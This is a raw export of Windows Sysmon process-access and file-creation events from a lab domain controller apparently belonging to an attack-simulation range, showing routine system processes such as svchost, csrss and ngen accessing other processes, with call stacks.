10341000x80000000000000006564Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:00.563{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006563Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:00.563{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006562Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:00.563{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006561Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:00.563{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006560Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:00.563{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006559Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:00.563{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006558Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:00.563{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006557Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:00.563{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006556Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:00.563{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006555Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:00.563{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9154-6005-5C02-00000000A301}4676C:\Windows\system32\usoclient.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006554Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:00.563{59A5CD1D-8E46-6005-1600-00000000A301}15442272C:\Windows\system32\svchost.exe{59A5CD1D-9154-6005-5C02-00000000A301}4676C:\Windows\system32\usoclient.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e014|c:\windows\system32\UBPM.dll+115a2|c:\windows\system32\EventAggregation.dll+3fae|c:\windows\system32\EventAggregation.dll+3ea1|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006553Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:00.563{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006552Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:00.563{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006578Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 
13:47:06.578{59A5CD1D-9150-6005-5B02-00000000A301}2632C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\a48-0\System.Data.Entity.dll2021-01-18 13:47:06.578 10341000x80000000000000006584Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:07.391{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-915B-6005-5F02-00000000A301}3500C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006583Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:07.391{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-915B-6005-5F02-00000000A301}3500C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006582Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:07.391{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-915B-6005-5F02-00000000A301}3500C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006581Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:07.016{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-915B-6005-5E02-00000000A301}2128C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006580Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:07.000{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-915B-6005-5E02-00000000A301}2128C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006579Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:07.000{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-915B-6005-5E02-00000000A301}2128C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006591Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:08.609{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-915C-6005-6102-00000000A301}3664C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006590Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:08.594{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-915C-6005-6102-00000000A301}3664C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006589Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:08.594{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-915C-6005-6102-00000000A301}3664C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006588Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:08.453{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-915C-6005-6002-00000000A301}2232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006587Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:08.453{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-915C-6005-6002-00000000A301}2232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006586Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:08.453{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-915C-6005-6002-00000000A301}2232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL
